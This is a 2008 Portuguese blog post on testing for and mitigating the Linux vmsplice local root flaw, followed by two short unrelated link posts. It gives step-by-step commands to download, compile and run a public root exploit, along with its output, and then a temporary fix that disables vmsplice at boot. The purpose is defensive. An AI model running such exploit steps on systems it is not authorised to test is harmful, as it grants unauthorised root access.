Alertas de Segurança de Software

quarta-feira, 7 de maio de 2008

Testando e Resolvendo Vulnerabilidades locais no kernel do Linux - Alerta do CAIS 20080213

Introdução


Esta dica é um resumo e serve para testar e solucionar a falha critica, baseado no alerta de segurança gerado pelo CAIS (CAIS – Centro de Segurança a Incidentes de Segurança ) utilizando a segunda opção - Desabilitar temporariamente a função do kernel vulnerável, até o próximo reinício do sistema e habilitando no boot. A primeira opção que seria a atualização do kernel não será abordada.



Testado na distribuição:Debian, CentOs 5.

1-Como testar seu servidor:
O teste é feito baixando exploit de:

wget
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c

Após baixar compile com o comando :
# gcc -o exploit 27704.c
Obs.: (gcc -o novo_nome_binario fonte_arquivo)

De permissão de execução:
Chmod 777 exploit

Será criado um executável:
./exploit

Copie para a pasta do usuário local, ex.:
# cp exploit /home/pedro

Entre com o comando:
su nome_do_usuario_comum (Para logar como usuário comum).

Execute o binario:
./exploit

A saída deve ser a seguinte:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7df6000 .. 0xb7e28000
[+] root

Depois você simplesmente digita o comando “su -” e não será pedido senha alguma para root e você terá acesso pleno ao servidor como usuario máximo.

2 - Como vacinar seu servidor:
Existem duas formas:

1-Atualização o Kernel (Link de abordamento):
http://www.securityfocus.com/bid/27704/solution

2-Desabilitar temporariamente a função do kernel vulnerável, até o próximo reinício do sistema:

Baixe no link :

wget http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c

Compile disable-vmsplice-if-exploitable.c:
# gcc -o desabilita-exp disable-vmsplice-if-exploitable.c
Obs.:(gcc -o novo_nome_binario fonte_arquivo)

Será gerado seguinte binário:
./desabilita-exp

Após a execução de ./desabilita-exp não terá mais problemas com a vulnerabilidade.


A saída de execução será esta:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
Exploit gone!

Coloque na inicialização do Sistema Operacional onde você desejar:
Ex.: /etc/rc.local ou no /etc/rcx.d

Reinicie o servidor e efetue os testes referenciados no item 1 .

Lembrando que esta medida é temporaria sem a necessidade de compilar o kernel.
Fontes:
http://www.rnp.br/cais/alertas/2008/cais-alr-20080213.html

http://www.securityfocus.com/bid/27704/info

http://archives.neohapsis.com/archives/fulldisclosure/2008-02/0268.html

Espero ter ajudado. Dúvidas e críticas construtivas estou a disposição.

segunda-feira, 5 de maio de 2008

Museu da Internet

Site onde estão arquivados todos os sites da internet, muito útil para achar versões antigas da internet ou sites fora do ar ha algum tempo, segue o link abaixo:
http://web.archive.org/

Instalar, configurar QMAIL

Link do QMAIL-ROCKS:
http://www.qmailrocks.org/